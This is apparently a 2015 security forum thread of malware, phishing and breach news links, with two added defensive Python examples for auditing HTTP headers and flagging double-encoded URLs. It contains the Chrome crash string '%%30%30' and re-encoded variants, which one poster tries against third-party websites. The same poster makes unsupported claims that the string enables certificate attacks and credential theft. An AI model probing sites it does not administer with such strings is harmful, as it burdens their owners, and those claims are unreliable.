plug-ins can be outdated and themes can have vulnerable code. To check your security with a quick and dirty cold reconnaissance scan go here: https://hackertarget.com/wordpress-security-scan/
I strongly advise WP website owners, website admins, pro-active hosters and other IT staff to do so.
One thing that will make you vulnerable is outdated, unpatched or even worse: left code. Do not leave your visitors at risk, update, patch and secure. Also we find a lot of server misconfiguration and security headers missing. It is not only website code, it is also hosters that do not take security of the domains they service at heart. Excessive server header proliferation (to the world and attackers) is wide-spread. Outdated and vulnerable server code is found. Do not be ignorant and have yourself informed by doing the necessary scans.
polonus (volunteer website security analyst and website error-hunter)
P.S. Just an example where we find the code Daniel Cid is referring to: -http://www.brainvalue.com/en/newsroom-en/feed/rss/newsroom/newsroom-2?format=feed
Consider: -http://www.domxssscanner.com/scan?url=http%3A%2F%2Fbrainvalue.com%2Fcomponents%2Fcom_contact%2Fcommon_configs%2Fvisitor.php%3Fmob%3D1
& read: http://wordpress.stackexchange.com/questions/188763/cookiechoices-js-keeps-reappearing-without-caching-plugin
Damian
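The post above names three server-side hygiene points: missing security headers, version-disclosing server headers, and an outdated CMS. The following is an added example, not from the thread or from Sucuri, that audits one captured HTTP response offline for all three. It parses the raw response text, lists the security headers that are absent, flags `Server`/`X-Powered-By`/`X-Generator` values that leak a version number, and compares a WordPress generator tag against a caller-supplied current version (4.3.1 here, the release mentioned later in this thread). Both responses are constructed; the weak one sits beside a hardened one for comparison.

```python
"""Offline audit of an HTTP response for missing security headers, version
disclosure and an outdated WordPress generator tag. Added example; both sample
responses are constructed."""
import re
from typing import Dict, List, Tuple

# Security headers a public site should send, with the reason each matters.
REQUIRED_HEADERS = {
    "strict-transport-security": "HTTPS sites should pin browsers to TLS (HSTS)",
    "content-security-policy": "without a CSP, injected scripts run unrestricted",
    "x-frame-options": "clickjacking protection missing",
    "x-content-type-options": "MIME sniffing not disabled",
}
# Headers that commonly advertise exact software versions to the world.
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-generator")
_VERSION_RE = re.compile(r"\d+\.\d+(?:\.\d+)?")
_GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="WordPress\s+([\d.]+)"', re.I)


def parse_response(raw: str) -> Tuple[Dict[str, str], str]:
    """Split a raw HTTP/1.1 response into a lower-cased header map and the body."""
    head, _, body = raw.partition("\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def version_tuple(v: str) -> Tuple[int, ...]:
    return tuple(int(x) for x in v.split("."))


def audit_response(raw: str, current_wp: str) -> List[str]:
    """Return findings for the three hygiene points; empty list means clean."""
    headers, body = parse_response(raw)
    findings: List[str] = []
    for name, why in REQUIRED_HEADERS.items():
        if name not in headers:
            findings.append(f"missing {name}: {why}")
    for name in DISCLOSING_HEADERS:
        if name in headers and _VERSION_RE.search(headers[name]):
            findings.append(f"{name} discloses a version: {headers[name]}")
    m = _GENERATOR_RE.search(body)
    if m and version_tuple(m.group(1)) < version_tuple(current_wp):
        findings.append(f"WordPress {m.group(1)} is behind {current_wp}")
    return findings


# Constructed weak response: verbose headers, no CSP/HSTS/nosniff, old WP.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.15 (CentOS)\r\n"
    "X-Powered-By: PHP/5.3.3\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "\r\n"
    '<html><head><meta name="generator" content="WordPress 4.2.2"></head>'
    "<body>...</body></html>"
)

# Constructed hardened response: same site after the fixes the post asks for.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Strict-Transport-Security: max-age=31536000\r\n"
    "Content-Security-Policy: default-src 'self'\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "\r\n"
    '<html><head><meta name="generator" content="WordPress 4.3.1"></head>'
    "<body>...</body></html>"
)

if __name__ == "__main__":
    for finding in audit_response(WEAK_RESPONSE, "4.3.1"):
        print(finding)
    print("hardened:", audit_response(HARDENED_RESPONSE, "4.3.1"))
```

To use it on a site you administer, save the response of a `curl -i` (or `curl -sD - -o body.html` plus the body) to a file and pass its text to `audit_response`; the generator check only fires when the theme still prints the WordPress generator tag, so an absent tag is not proof of an up-to-date install.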
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1442614167358-6298.png)
-
Hi bob3160,
???? because there is a brand new WP update out - 4.3.1
Even a better scan here: https://sitecheck.sucuri.net/results/bob3160.wordpress.com
Analysing on https://s2.wp.com/wp-content I found this plug-in questionable: ie-sitemode
You may not have it, but I see no update address for that code, has it been left?
This has some sources and sinks, but I see no immediate threat: -http://www.domxssscanner.com/scan?url=http%3A%2F%2F0.gravatar.com%2Fjs%2Fgprofiles.js%3Fver%3D201538y
Nothing here: -http://www.domxssscanner.com/scan?url=https%3A%2F%2Fs2.wp.com%2Fwp-content%2Fmu-plugins%2Fgravatar-hovercards%2Fwpgroho.js%3Fm%3D1380573781g
Some sources and sinks: -http://www.domxssscanner.com/scan?url=-https%3A%2F%2Fplatform.twitter.com%2Fwidgets.js%3Fver%3D20111117
and all touching on: -http://d.rmgserving.com/rmgdsc/newcafv2.js?1.1
as goes for this: -http://www.domxssscanner.com/scan?url=https%3A%2F%2Fs.skimresources.com%2Fjs%2F725X1342.skimlinks.js
and finally this-http://www.domxssscanner.com/scan?url=http%3A%2F%2Fstats.wp.com%2Fw.js%3F48
which most adblockers block for us: uMatrix has prevented the following page from loading:
-http://stats.wp.com/w.js?48
You can be assured that website is secure as far as I could establish. And Sucuri agrees with me.
See the website risk status that Netcraft gives: http://toolbar.netcraft.com/site_report?url=https://bob3160.wordpress.com
but that could have to do with the fact Netcraft sees this site for the first time, that is why the 7 red out of 10 risk score.
All's well, bob3160, ;)
Damian
-
ie-sitemode is there because I use Windows Live Writer?
-
Hi bob3160,
Well it was my pleasure checking and going over the script code there and a reassuring all green for you is not bad at all.
Congratulations.
Well I think you did not expect anything else, really :D
Damian
-
DNS Hijacks: What to Look For
https://blog.malwarebytes.org/online-security/2015/09/dns-hijacks-what-to-look-for/?utm_source=Gplus&utm_medium=social
“Your PC Is Infected” Round-up…
https://blog.malwarebytes.org/online-security/2015/09/your-pc-is-infected-round-up/?utm_source=Gplus&utm_medium=social
-
AVG releases transparent privacy policy: Yes, we will sell your data
http://www.zdnet.com/article/avg-releases-transparent-privacy-policy-yes-we-will-sell-your-data/
AVG will sell the data of its users to third parties in order to keep basic antivirus software free
-
AVG releases transparent privacy policy: Yes, we will sell your data
http://www.zdnet.com/article/avg-releases-transparent-privacy-policy-yes-we-will-sell-your-data/
AVG will sell the data of its users to third parties in order to keep basic antivirus software free
It's interesting how AVG thinks of "copies of files or emails" as "non-personal data" just because they were "marked as potential malware".
We collect non-personal data to improve our products and services, including:
data concerning potential malware threats to your device and the target of those threats, including copies of files or emails marked as potential malware, file names, cryptographic hash, vendor, size, date stamps, associated registry keys, etc.;
...snip...
http://www.avg.com/us-en/privacy-new#what-do-you-collect-that-cannot-identify-me
And,
"We collect non-personal data to make money from our free offerings so we can keep them free, including:
...snip...
Browsing and search history, including meta data;"
even though they also say
"Sometimes browsing history or search history contains terms that might identify you. If we become aware that part of your browsing history might identify you, we will treat that portion of your history as personal data, and will anonymize this information..."
So, AVG users have to trust AVG that AVG can deem what parts of their browsing history or search history contain terms that might identify them! Good luck with that!
Besides, I never like when a privacy policy uses the word "including...". That begs the question: and what else?
-
199 hacked routers SYNful Knock: http://blog.shadowserver.org/2015/09/21/synful-knock/
polonus
-
Nasty URL bug brings Google Chrome to a screeching halt (http://www.pcworld.com/article/2984907/security/nasty-url-bug-brings-google-chrome-to-a-screeching-halt.html)
Simply add "%%30%30" to the end of any URL in chrome and watch it crash.
-
Hi bob3160,
This string abuse works because the browser actually wants this to execute as %25%2530%2530
When I give your string in following directly from "https://ad.nl/" the browser url bar shows: http://caja.appspot.com/#https://ad.nl/%25%2530%2530
and this can be abused because my connection is no longer private; your bug code can be used as a privacy error and for stealing credentials like passwords, messages, credit card details, etc. Did you notice that, bob3160? :o
What you do with %%30%30 translated into %25%2530%2530 is a certificate hack and the server certificate no longer matches that URL or v.v. and the use of an older Cipher Suite is being flagged. Did you notice that, bob3160? :o
We stumbled upon something that could lead to indirect abuse on a large scale. Thank you very, very much for reporting this.
Trying this on the nameserver there: -http://ns1-25.akam.net/%25%2530%2530 and then consider this: 10 red out of 10 red Netcraft risk status. This certainly is an issue that goes beyond a mere Google Chrome browser bug, bob3160, you stumbled on something that needs to be analysed further, my good friend. Here the server just opens the main page: http://www.telegraaf.nl//%25%2530%2530
Damian
-
Not something I stumbled upon simply something I'm reporting.
Follow the link I supplied for more information. :)
-
That link is empty, I get an about:blank
Can you provide us with a working link?
Was it reported 21 hours ago here?: http://www.pcworld.com/article/2984907/security/nasty-url-bug-brings-google-chrome-to-a-screeching-halt.html
And the one that detected it originally: http://andrisatteka.blogspot.com/2015/09/a-simple-string-to-crash-google-chrome.html
The %25%2530%2530 translation that actually could play havoc on some https servers was my experiment here ;D
polonus
-
OOPS, it's been corrected. :)
-
Now when I enter this https://www.security.nl/%2525%252530%252530
1. https://www.security.nl/%2525%252530%252530 Security.NL 57,992 bytes 641 ms
I get here: https://www.security.nl/?welcome
And there are sources and sinks to consider: http://www.domxssscanner.com/scan?url=https%3A%2F%2Fwww.security.nl%2F%252525%25252530%25252530%09
Results from scanning URL: https://www.security.nl/js/dfp.js?1375741199
Number of sources found: 28
Number of sinks found: 11
Results from scanning URL: https://www.security.nl/js/dfp.js?1375741199
Number of sources found: 1
Number of sinks found: 1
Results from scanning URL: https://www.security.nl/js/dfp.js?1375741199
Number of sources found: 122
Number of sinks found: 60
Indeed equalling these results: http://www.domxssscanner.com/scan?url=https%3A%2F%2Fwww.security.nl%2F%3Fwelcome
Interesting and the results on various servers should be established.
This server is further secured against this and I meet a neat 404 error. This is as it should be:
http://www.huffingtonpost.com/%2525%252530%252530
Oh, Noes! A 404! As I approached this locally.
Here the whole page disappears which kicks up a dev/null: http://www.nu.nl/%2525%252530%252530 :o
polonus
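The `%%30%30`, `%25%2530%2530` and `%2525%252530%252530` strings in the posts above are the same value wrapped in successive layers of percent-encoding: each decoding pass strips one layer, and the innermost value is `%00`, a NUL byte. On the server side the defensive rule is to decode once and treat anything that still needs a further pass, or that ends up containing control bytes, as malformed input to be rejected and logged. The following is an added example of that check, written against Python's standard library; it is not code from the posts, from Chrome, or from any site mentioned, and the pass limit and sample paths are constructed for illustration.

```python
from urllib.parse import unquote

MAX_PASSES = 5  # assumption: enough passes to unwrap any realistic nesting


def decode_passes(path: str, max_passes: int = MAX_PASSES) -> list:
    """Percent-decode `path` repeatedly until the result stops changing.

    Returns every stage, starting with the raw input, so the caller can
    see how many layers of encoding were stacked on top of each other.
    """
    stages = [path]
    current = path
    for _ in range(max_passes):
        decoded = unquote(current)
        if decoded == current:
            break
        stages.append(decoded)
        current = decoded
    return stages


def classify(path: str) -> dict:
    """Describe a request path for an access-control or logging decision.

    A well-formed path needs at most one decoding pass. Needing two or more
    means it was double-encoded; ending with control bytes (NUL, CR, LF...)
    means it should be rejected before any further handling.
    """
    stages = decode_passes(path)
    final = stages[-1]
    control = [c for c in final if ord(c) < 0x20 or ord(c) == 0x7F]
    passes = len(stages) - 1
    return {
        "passes": passes,
        "double_encoded": passes > 1,
        "control_bytes": bool(control),
        "final": final,
        "reject": passes > 1 or bool(control),
    }


if __name__ == "__main__":
    # Constructed samples: the string from the posts above in its raw,
    # once-encoded and twice-encoded spellings, plus an ordinary path.
    for sample in ("/%%30%30", "/%25%2530%2530",
                   "/%2525%252530%252530", "/a%20b"):
        print(repr(sample), "->", classify(sample))
```

Note that a legitimately double-encoded path (a literal `%25` that the application wants to see as `%`) is also flagged; that is deliberate, since a front end that decodes more than once is exactly what makes filter bypasses and the NUL-byte case possible, and such paths should be rare enough to allow-list explicitly.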
-
XcodeGhost malware infiltrates App Store
https://blog.malwarebytes.org/mac/2015/09/xcodeghost-malware-infiltrates-app-store/?utm_source=Gplus&utm_medium=social
Unconventional Malvertising Attack Uses New Tricks
WordPress Malware – Active VisitorTracker Campaign
https://blog.sucuri.net/2015/09/wordpress-malware-active-visitortracker-campaign.html?utm_campaign=WordPress%20Malware%20%E2%80%93%20Active%20VisitorTracker%20Campaign%20Blogpost&utm_medium=social&utm_source=googleplus
-
Symantec employees fired for issuing rogue HTTPS certificate for Google
http://arstechnica.com/security/2015/09/symantec-employees-fired-for-issuing-rogue-https-certificate-for-google/
-
Another reason to stick to your Adblocker: https://grahamcluley.com/2015/09/forbes-malvertising/
article author - Graham Cluley
"Malvertising continues to be an attack vector of choice for criminals making use of exploit kits. By abusing ad platforms – particularly ad platforms that enable Real Time Bidding – attackers can selectively target where the malicious content gets displayed."
"When these ads are served by mainstream websites, the potential for mass infection increases significantly, leaving users and enterprises at risk."
polonus
-
Again malvertising campaign: https://blog.malwarebytes.org/malvertising-2/2015/09/malvertising-attack-hits-realtor-com-visitors/
pol
-
.htaccess Tricks in Global.asa Files
https://blog.sucuri.net/2015/09/htaccess-tricks-in-global-asa-files.html?utm_campaign=.htaccess%20Tricks%20in%20Global.asa%20Files%20Blogpost&utm_medium=social&utm_source=googleplus
GTA 5 Money Generator Scams: They’re Wheelie Bad
https://blog.malwarebytes.org/fraud-scam/2015/09/gta-5-money-generator-scams-theyre-wheelie-bad/?utm_source=Gplus&utm_medium=social
Press H to Hack: Unsolicited
https://blog.malwarebytes.org/privacy-2/2015/09/press-h-to-hack-unsolicited/
Imgur Abused in DDoS Attack Against 4Chan!
https://blog.malwarebytes.org/hacking-2/2015/09/imgur-abused-in-ddos-attack-against-4chan/
Ghostery: A Tool that Stops Trackers (This is one add-on most of us use) (FYI, I have disabled the pop-up bubble.)
https://blog.malwarebytes.org/privacy-2/2015/09/ghostery-a-tool-that-stop-trackers/
-
Kovter malware upgraded with Poweliks features
http://www.scmagazine.com/kovter-malware-upgraded-with-poweliks-features/article/440711/
Kovter malware learns from Poweliks with persistent fileless registry update
http://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update
-
Fake Online Avast Scanner
https://blog.malwarebytes.org/online-security/2015/09/fake-online-avast-scanner/
-
Fake Online Avast Scanner
https://blog.malwarebytes.org/online-security/2015/09/fake-online-avast-scanner/
This is a bit misleading since you only get to this by mistyping the Malwarebytes website.
I highly doubt that this scanner gets much use.
-
Fake Online Avast Scanner
https://blog.malwarebytes.org/online-security/2015/09/fake-online-avast-scanner/
This is a bit misleading since you only get to this by mistyping the Malwarebytes website.
I highly doubt that this scanner gets much use.
+1 But the fact that it's out there could mean trouble for avast.
-
SSL Malvertising Campaign Targets Top Adult Sites (Watching porn has a price.)
https://blog.malwarebytes.org/malvertising-2/2015/09/ssl-malvertising-campaign-targets-top-adult-sites/
Don’t have a Meltdown over this Lunchbox Fallout
https://blog.malwarebytes.org/fraud-scam/2015/09/dont-have-a-meltdown-over-this-lunchbox-fallout/
-
Fake Online Avast Scanner
https://blog.malwarebytes.org/online-security/2015/09/fake-online-avast-scanner/
This is a bit misleading since you only get to this by mistyping the Malwarebytes website.
I highly doubt that this scanner gets much use.
+1 But the fact that it's out there could mean trouble for avast.
I beg to differ, first someone has to A) mistype the URL as Bob said, B) ignore the obvious porn image, suspect to say the least C) then they would have to elect to run the fake scan and D) it would have to get past your real AV software.
That's a lot of ifs and you would like to hope the user would have enough common sense after all of them to back off.
-
Yes it takes a somewhat dumb user to fall into the trap, but the world is full of somewhat dumb users. :-\
Few dumb users claiming that "Avast infected my PC" (while in reality it was the fake site) might be enough to cause trouble, especially if reported with some alarming headlines in the media.
If I were in Avast's shoes, I would take immediate legal action and try to take the site down.
-
On several blacklists now
https://www.virustotal.com/en/url/f3b2e6cc365cdbc13ac17076f56b935af20621fb09ea44abbd681f16c0ef124f/analysis/1443348829/
-
Yes it takes a somewhat dumb user to fall into the trap, but the world is full of somewhat dumb users. :-\
Few dumb users claiming that "Avast infected my PC" (while in reality it was the fake site) might be enough to cause trouble, especially if reported with some alarming headlines in the media.
If I were in Avast's shoes, I would take immediate legal action and try to take the site down.
I reported the website to them via their support page :)
SITE IS NOW BLOCKED BY AVAST
-
WinRAR SFX v5.21 - Remote Code Execution Vulnerability
http://seclists.org/fulldisclosure/2015/Sep/106
-
Cookie handling in browsers can break HTTPS security
http://www.networkworld.com/article/2986286/cookie-handling-in-browsers-can-break-https-security.html
-
Mobile Ad Networks as DDoS Vectors: A Case Study
https://blog.cloudflare.com/mobile-ad-networks-as-ddos-vectors/
-
ConfigFox: manage advanced Firefox privacy and security settings
http://www.ghacks.net/2015/09/29/configfox-manage-advanced-firefox-privacy-and-security-settings/
-
WP exploit kit hacks thousands and thousands of websites to redirect to pages with Nuclear-exploitkit!
Read article by Daniel Cid here: https://blog.sucuri.net/2015/09/wordpress-malware-visitortracker-campaign-update.html
Google watch.php malware please. For instance: http://malwarefor.me/2015-06-15-nuclear-ek-glupteba-operation-windigo-again/
polonus
-
Latest WinRAR Vulnerability has Yet to be Patched
https://blog.malwarebytes.org/security-threat/2015/09/latest-winrar-vulnerability-has-yet-to-be-patched/?utm_source=Gplus&utm_medium=social
This Instagram Account Preys on Your Trust Issues
https://blog.malwarebytes.org/online-security/2015/09/this-instagram-account-preys-on-your-trust-issues/?utm_source=Gplus&utm_medium=social
Crowdfunder Indiegogo Misused by Spammers
https://blog.malwarebytes.org/online-security/2015/09/crowdfunder-indiegogo-beset-by-spammers/?utm_source=twitter&utm_medium=social
Malvertising Via Google AdWords Leads to Fake BSOD
https://blog.malwarebytes.org/fraud-scam/2015/09/malvertising-via-google-adwords-leads-to-fake-bsod/?utm_source=Gplus&utm_medium=social
Analyzing Black Hat URL Shorteners
https://blog.sucuri.net/2015/09/analyzing-black-hat-url-shorteners.html?utm_campaign=Analyzing%20Black%20Hat%20URL%20Shorteners%20Blogpost&utm_medium=social&utm_source=googleplus
-
Patreon got attacked, users advised to change their passwords https://www.patreon.com/posts/important-notice-3457485
-
Skype Hacking Tool: A Sting in the Tail
https://blog.malwarebytes.org/fraud-scam/2015/09/skype-hacking-tool-a-sting-in-the-tail/?utm_source=Gplus&utm_medium=social
Top 50 InfoSec Blogs You Should Be Reading
https://digitalguardian.com/blog/top-50-infosec-blogs-you-should-be-reading?utm_campaign=External%3A%20Top%2050%20InfoSec%20Blogs%20You%20Should%20Be%20Reading%20-%20DigitalGuardian&utm_medium=social&utm_source=googleplus
-
Experian Notifies Consumers In The U.S. Who May Have Been Affected By Unauthorized Acquisition Of A Client's Data
http://www.prnewswire.com/news-releases/experian-notifies-consumers-in-the-us-who-may-have-been-affected-by-unauthorized-acquisition-of-a-clients-data-300152926.html
http://www.t-mobile.com/landing/experian-data-breach.html
-
Adblock for Chrome sold, joins Adblock Plus’ Acceptable Ads program
http://www.ghacks.net/2015/10/02/adblock-for-chrome-sold-joins-adblock-plus-acceptable-ads-program/
-
Adblock extension with 40 million users sells to mystery buyer, refuses to name new owner
http://thenextweb.com/apps/2015/10/02/trust-us-we-block-ads/
https://adblockplus.org/blog/from-the-manifesto-to-the-acceptable-ads-board
-
http://arstechnica.com/security/2015/10/gigabytes-of-user-data-from-hack-of-patreon-donations-site-dumped-online/
Patreon attack details and the leak includes source and everything including private messages and details about campaigns ...
-
Security advisory: Stored XSS in Jetpack (Cross scripting is an ever present danger.)
https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-jetpack.html?utm_campaign=Security%20advisory%3A%20Stored%20XSS%20in%20Jetpack%20Blogpost&utm_medium=social&utm_source=googleplus
New Stagefright exploit puts over 1 billion Android devices at risk
http://www.androidauthority.com/new-stagefright-exploit-puts-1-billion-android-devices-risk-646368/
The Growing Threat from Phishing
https://blog.malwarebytes.org/social-engineering/2015/10/the-growing-threat-from-phishing/?utm_source=Gplus&utm_medium=social
-
Security advisory: Stored XSS in Jetpack (Cross scripting is an ever present danger.)
https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-jetpack.html?utm_campaign=Security%20advisory%3A%20Stored%20XSS%20in%20Jetpack%20Blogpost&utm_medium=social&utm_source=googleplus
<snip>
The Firefox RequestPolicy add-on is good for preventing XSS as you have to give explicit permission for 3rd party sites. It can be somewhat inconvenient for many people as sites can have tens of links/access to 3rd party sites.
-
“This PDF version is not supported” Data URI Phish
https://blog.malwarebytes.org/online-security/2015/10/this-pdf-version-is-not-supported-data-uri-phish/?utm_source=Gplus&utm_medium=social
Beware of Tech Support Impersonators
https://blog.malwarebytes.org/fraud-scam/2015/10/beware-of-tech-support-impersonators/?utm_source=Gplus&utm_medium=social
-
Is there an Internet-of-Things vigilante out there?
Linux.Wifatch compromises routers and other Internet of Things devices and appears to try and improve infected devices’ security.
www.symantec.com/connect/blogs/there-internet-things-vigilante-out-there
-
Data breaches: always the same vulnerability factor = human :o
Read: http://arstechnica.com/security/2015/10/patreon-was-warned-of-serious-website-flaw-5-days-before-it-was-hacked/
It is almost impossible to fully secure an environment to which human beings have access.
This is one of the main truths of digital security. Human equals insecurity by default!
polonus
-
Damien,
So to improve security and stop all of the breaches, should we all shoot ourselves ???
It would certainly stop all problems. :)
-
Has the dislike button finally arrived to Facebook? ..... Of course not, don’t be fooled!
http://www.pandasecurity.com/mediacenter/news/dislike-button-facebook/
-
Nearly 1 million new malware threats released every day
http://money.cnn.com/2015/04/14/technology/security/cyber-attack-hacks-security/
PandaLabs detected more than 21 million new threats during the second quarter of 2015, an increase of 43% compared to the same period in 2014
http://www.pandasecurity.com/mediacenter/news/pandalabs-detected-more-than-21-million-new-threats/
IT threat evolution in Q1 2015
https://securelist.com/analysis/quarterly-malware-reports/69872/it-threat-evolution-in-q1-2015/
Malware statistic https://www.av-test.org/en/statistics/malware/
Spam statistic https://www.av-test.org/en/statistics/spam/
and some worry about False Positives ....
-
Beware of Tech Support Impersonators
https://blog.malwarebytes.org/fraud-scam/2015/10/beware-of-tech-support-impersonators/?utm_source=twitter&utm_medium=social
-
Beware of Tech Support Impersonators
https://blog.malwarebytes.org/fraud-scam/2015/10/beware-of-tech-support-impersonators/?utm_source=twitter&utm_medium=social
After reading that article, it all sounded very familiar. 8)
-
Beware of Tech Support Impersonators
https://blog.malwarebytes.org/fraud-scam/2015/10/beware-of-tech-support-impersonators/?utm_source=twitter&utm_medium=social
After reading that article, it all sounded very familiar. 8)
I wonder where you got that idea. ;D
-
Malvertising Campaign Targets Top Spanish Torrent Sites
https://blog.malwarebytes.org/malvertising-2/2015/10/malvertising-campaign-targets-top-spanish-torrent-sites/?utm_source=Gplus&utm_medium=social
Video Saver PUP Blocks You From Changing Your Default Browser
https://blog.malwarebytes.org/security-threat/2015/10/video-saver-pup-blocks-you-from-changing-your-default-browser/?utm_source=Gplus&utm_medium=social
Bypassing Apple’s Gatekeeper
https://blog.malwarebytes.org/mac/2015/10/bypassing-apples-gatekeeper/?utm_source=Gplus&utm_medium=social
Notes from the Lab
http://labs.sucuri.net/?note=2015-10-05&utm_campaign=Malware%20in%20comments%20Note&utm_medium=social&utm_source=googleplus
Phishing for Anonymous Alligators
https://blog.sucuri.net/2015/10/phishing-for-anonymous-alligators.html?utm_campaign=Phishing%20for%20Anonymous%20Alligators%20blogpost&utm_medium=social&utm_source=googleplus
-
Finds Angler servers at a Dallas hosting provider during research
http://www.networkworld.com/article/2989827/security/cisco-disrupts-60m-ransomware-biz.html?phint=newt%3Dnetworkworld_daily_news_alert&phint=idg_eid%3D52948c736ecce9e676edc4c93f707d83#tk.NWWNLE_nlt_daily_am_2015-10-07
-
Mozilla announces the end of NPAPI plugins in Firefox
http://www.ghacks.net/2015/10/08/mozilla-announces-the-end-of-npapi-plugins-in-firefox/
-
SHA-1-algorithm should be phased out earlier according to Dutch, French and Singapore researchers.
Read here in a joint press release from: Centrum Wiskunde & Informatica (CWI) in the Netherlands, Inria in France and Nanyang Technological University in Singapore (NTU Singapore):
http://www.cwi.nl/news/2015/researchers-urge-industry-standard-sha-1-should-be-retracted-sooner
polonus
-
Chinese Hackers Breached LoopPay, Whose Tech Is Central to Samsung Pay
http://www.nytimes.com/2015/10/08/technology/chinese-hackers-breached-looppay-a-contributor-to-samsung-pay.html
http://global.samsungtomorrow.com/samsung-pay-is-safe-secure-and-works-almost-anywhere-you-can-swipe-or-tap-a-card-today/
-
Vulnerable Netgear Router hack, article author Michael Mimoso: https://threatpost.com/disclosed-netgear-router-vulnerability-under-attack/114960/
Hack took place mainly from malservers inside the USA and victims were mainly US users. Pressure is mounting on Netgear to patch!
Action is being taken to take the attack server(s) down.
Netgear routers with router firmware N300_1.1.0.31_1.0.1.img and N300-1.1.0.28_1.0.1.img are vulnerable to such an attack,
as used for the WNR1000v4 router.
polonus
-
“GTA V for Mobile” Sites Lead to Surveys
https://blog.malwarebytes.org/online-security/2015/10/gta-v-for-mobile-sites-lead-to-surveys/?utm_source=Gplus&utm_medium=social
Brute Force Amplification Attacks Against WordPress XMLRPC
https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html?utm_campaign=Brute%20Force%20Amplification%20Attacks%20Against%20WordPress%20XMLRPC%20blogpost&utm_medium=social&utm_source=googleplus
-
Tech Support Scam Asks for Passkey
https://blog.malwarebytes.org/fraud-scam/2015/10/tech-support-scam-asks-for-passkey/?utm_source=Gplus&utm_medium=social
SHA1 algorithm securing e-commerce and software could break by year’s end
http://arstechnica.com/security/2015/10/sha1-crypto-algorithm-securing-internet-could-break-by-years-end/?utm_campaign=External%3A%20SHA1%20algorithm%20securing%20e-commerce%20and%20software%20could%20break%20by%20year%E2%80%99s%20end&utm_medium=social&utm_source=googleplus
Security Tips & Tricks for the iPhone 6s/6s Plus
https://blog.malwarebytes.org/mobile-2/2015/10/security-tips-tricks-for-the-iphone-6s6s-plus/?utm_source=Gplus&utm_medium=social
We as a forum community know and learn about security issues.
It's the average user who doesn't have a clue that will wonder "what happened?".
The main security issue is PEBKAC.
-
Here we go again, once more mal-ads on Kickass Torrents
Reported here: https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fkat.cr%2F&client=googlechrome&hl=en-US abuse was reported by Google Safebrowsing research!
Users of the Firefox and Google Chrome browsers are protected by default, as kat.cr is blocked.
And yes again sloppy cheap bulk-hoster, GoDaddy, at the core of this abuse: https://urlquery.net/report.php?id=1444570618399
where allegedly Rip van Winkle has an IT job now ;) : http://sitevet.com/db/asn/AS26496 with 10500 blacklisted URLs hosted.
polonus (volunteer website security analyst and website error-hunter)
-
Dow Jones & Company Inc. Data Leak
http://s.wsj.net/message/dowjonesletter-20151009.pdf
-
Obvious browser security mistakes often made:
Having multiple tabs opened in the web browser with mixed secure and insecure sites.
For example, don't log in to your secure forum account here when you simultaneously visit a torrent site.
polonus
-
Obvious browser security mistakes often made:
Having multiple tabs opened in the web browser with mixed secure and insecure sites.
For example, don't log in to your secure forum account here when you simultaneously visit a torrent site.
polonus
Who visits torrent sites ???
-
Obvious browser security mistakes often made:
Having multiple tabs opened in the web browser with mixed secure and insecure sites.
For example, don't log in to your secure forum account here when you simultaneously visit a torrent site.
polonus
Who visits torrent sites ???
Millions of people.
-
Obvious browser security mistakes often made:
Having multiple tabs opened in the web browser with mixed secure and insecure sites.
For example, don't log in to your secure forum account here when you simultaneously visit a torrent site.
polonus
Who visits torrent sites ???
Millions of people.
One of the reasons why there's so much activity on the Virus & Worms section of the forum. :)
-
All depends on what you're trying to download and how well you research your sources, I've never been infected via a torrent but I don't just click - click - click ;)
Most of our ECU ( engine control unit ) files are shared via torrents for accessibility so there are many good reasons to use torrents as well and not just for illegal movies and such.
-
Hi bob3160 and CraigB,
But knowing you two would react, then I would have chosen another example of course. ;D
So you shouldn't open a secure tab next to an insecure tab as tracking info from the secure one could spill over to the insecure one. So whenever doing online banking for instance, close all other tabs and/or browsers. That was the essence of my warning and I was speaking in general and not about the alleged insecurity of torrent sites, while Kickass Torrents had some malicious ads lately that were highly infectious. :(
But as a recent Kaspersky report has found out that 75% of users do not know an infested extension from an uninfested one (and fall for mp3.exe or a scr file for instance) and only 25% know a real website from a PHISHING site, a lot of folks really should have their computers taken from them because of sheer ignorance and "nitwit". ;D
polonus
-
Hundreds of SSL certificates issued to PHISHing sites: http://news.netcraft.com/archives/2015/10/12/certificate-authorities-issue-hundreds-of-deceptive-ssl-certificates-to-fraudsters.html
pol
-
Dow Jones Discloses Customer Data Breach
http://www.wsj.com/articles/dow-jones-discloses-customer-data-breach-1444406517
(Owned by News Corp. via Dow Jones and Company)
-
“Casino Online Award” 419 Scam…
https://blog.malwarebytes.org/fraud-scam/2015/10/casino-online-award-419-scam/?utm_source=Gplus&utm_medium=social
-
Microsoft Security Bulletin Summary for October 2015
https://technet.microsoft.com/en-us/library/security/ms15-oct.aspx
-
Caution! PayPal Phishing e-mail Scam
(http://www.screencast-o-matic.com/screenshots/u/Lh/1444823237881-69161.png)
It may look official but,
1. It didn't come from Paypal
2. The link to "Restore" your PayPal account, leads to
(http://www.screencast-o-matic.com/screenshots/u/Lh/1444823602884-55136.png) which has nothing to do with PayPal.
3. Notice the bad grammar and the spelling and punctuation errors.
(http://www.screencast-o-matic.com/screenshots/u/Lh/1444823522999-79485.png)
If you're using Avast, it also protects you since it prevents you from getting to the actual Website.
PayPal will never ask you via email to click on a link to do anything pertaining to your PayPal account.
-
@ Bob,
English isn't their strong suit, as is the case for many of these scam attempts.
-
Angler Exploit Kit Blasts Daily Mail Visitors Via Malvertising
